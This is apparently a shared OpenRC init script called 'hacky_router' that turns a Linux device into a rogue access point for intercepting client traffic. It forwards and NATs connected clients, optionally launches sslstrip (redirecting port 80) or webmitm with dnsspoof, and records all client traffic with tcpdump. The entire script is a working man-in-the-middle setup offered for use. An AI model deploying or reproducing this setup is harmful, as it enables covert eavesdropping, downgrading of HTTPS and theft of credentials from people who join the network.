hacky_router

1. #!/sbin/runscript
2. # this script need a few config parameters in /etc/conf.d/$(basename $0):
3. # IF_SERVER is the server interface ( the one accepting clients connections )
4. # IF_CLIENT is the client interface ( the one connected to the internet )
5. # ssl_handler can be webmitm or sslstrip or nothing.
6. # check my post for a better explaination: http://lifeinarootshell.blogspot.it/2013/04/tf201-as-sniffbox.html
7. extra_commands="clear"
8.  
9. depend()
10. {
11.    need hostapd dhcpd
12. }
13.  
14. flush()
15. {
16.    iptables -F
17.    iptables -t nat -F
18.    iptables -X
19.    iptables -t nat -X
20. }
21.  
22. clear()
23. {
24.    ebegin "Clearing /var/lib/tcpdump directory"
25.    rm -rf /var/lib/tcpdump/*
26.    eend $?
27. }
28.  
29. start()
30. {
31.    flush
32.    echo 1 > /proc/sys/net/ipv4/ip_forward
33.    iptables -t nat -A POSTROUTING -o $IF_CLIENT -j MASQUERADE
34.    iptables -A FORWARD -i $IF_CLIENT -o $IF_SERVER -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
35.    iptables -A FORWARD -o $IF_CLIENT -i $IF_SERVER -j ACCEPT
36.    use_dnsspoof="no"
37.    case $ssl_handler in
38.     webmitm)
39.         ebegin "Starting webmitm"
40.         start-stop-daemon --start -b -d /etc/webmitm --exec /usr/sbin/webmitm -- -d
41.         eend $?
42.         use_dnsspoof="yes"
43.         ;;
44.     sslstrip)
45.         ebegin "Starting sslstrip"
46.         iptables -t nat -A PREROUTING -i $IF_SERVER -p tcp --destination-port 80 -j REDIRECT --to-port 10000
47.         start-stop-daemon -b --start -m -p /var/run/sslstrip.pid python /usr/lib/sslstrip/sslstrip.py -- -kw /dev/null
48.         eend $?
49.         ;;
50.     *)
51.         einfo "sniffing raw traffic."
52.         ;;
53.    esac
54.    if [ "x$use_dnsspoof" == "xyes" ]; then
55.     ebegin "Starting dnsspoof"
56.            start-stop-daemon --start -b --exec /usr/sbin/dnsspoof -- -i $IF_SERVER
57.            eend $?
58.    else
59.     # don't waste time finding the current dns servers, use th google open one. thanks mom :)
60.     iptables -t nat -I PREROUTING -i $IF_SERVER -p udp --destination-port 53 -j DNAT --to 8.8.8.8
61.    fi
62.    ebegin "Starting tcpdump"
63.    start-stop-daemon --start -b --exec /usr/sbin/tcpdump -- -nps0 -i $IF_SERVER -w $(date +%d-%m-%Y_%H-%M).cap -C 10
64.    eend $?
65.    einfo sniff files will be in /var/lib/tcpdump folder
66. }
67.  
68. stop()
69. {
70.    flush
71.    echo 0 > /proc/sys/net/ipv4/ip_forward
72.    case $ssl_handler in
73.     webmitm)
74.         ebegin "Stopping webmitm"
75.         start-stop-daemon --stop --exec /usr/sbin/webmitm
76.         eend $?
77.         ebegin "Stopping dnsspoof"
78.             start-stop-daemon --stop --exec /usr/sbin/dnsspoof
79.             eend $?
80.         ;;
81.     sslstrip)
82.         ebegin "Stopping sslstrip"
83.         start-stop-daemon --stop -p /var/run/sslstrip.pid
84.         eend $?
85.         ;;
86.    esac
87.    ebegin "Stopping tcpdump"
88.    start-stop-daemon --stop --exec /usr/sbin/tcpdump
89.    eend $?
90. }